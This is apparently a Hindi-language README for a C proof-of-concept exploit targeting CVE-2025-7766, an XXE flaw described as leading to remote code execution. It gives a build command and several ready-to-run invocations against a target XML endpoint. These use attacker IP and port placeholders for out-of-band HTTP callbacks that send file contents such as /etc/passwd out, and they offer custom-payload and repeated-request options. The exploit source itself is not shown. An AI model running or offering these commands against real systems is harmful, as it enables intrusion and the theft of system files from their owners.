
CVE-2025-7766 के लिए C-आधारित PoC एक्सप्लॉइट जो फ़ाइल पढ़ने और आउट-ऑफ-बैंड HTTP कॉलबैक के माध्यम से XXE-से-RCE प्रदर्शित करता है। कस्टम XML पेलोड और दोहराए गए अनुरोधों का समर्थन करता है।
CVE-2025-7766 में XML बाहरी इकाई (XXE) कमजोरी का शोषण करने के लिए PoC। फ़ाइल पढ़ने (/etc/passwd) और आउट-ऑफ-बैंड HTTP कॉलबैक का प्रदर्शन।
लेखक: Byte Reaper
CVE: CVE-2025-7766
कमजोरी: XML बाहरी इकाई (XXE) के माध्यम से दूरस्थ कोड निष्पादन
/etc/passwd पढ़ना।gcc -o exploit exploit.c argparse.c -lcurl
# फ़ाइल पढ़ने का पेलोड
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT
# आउट-ऑफ-बैंड अनुरोध पेलोड
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r
# कस्टम पेलोड
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'
# अनुरोधों को 5 बार दोहराएँ
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5
# विस्तृत आउटपुट
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
MIT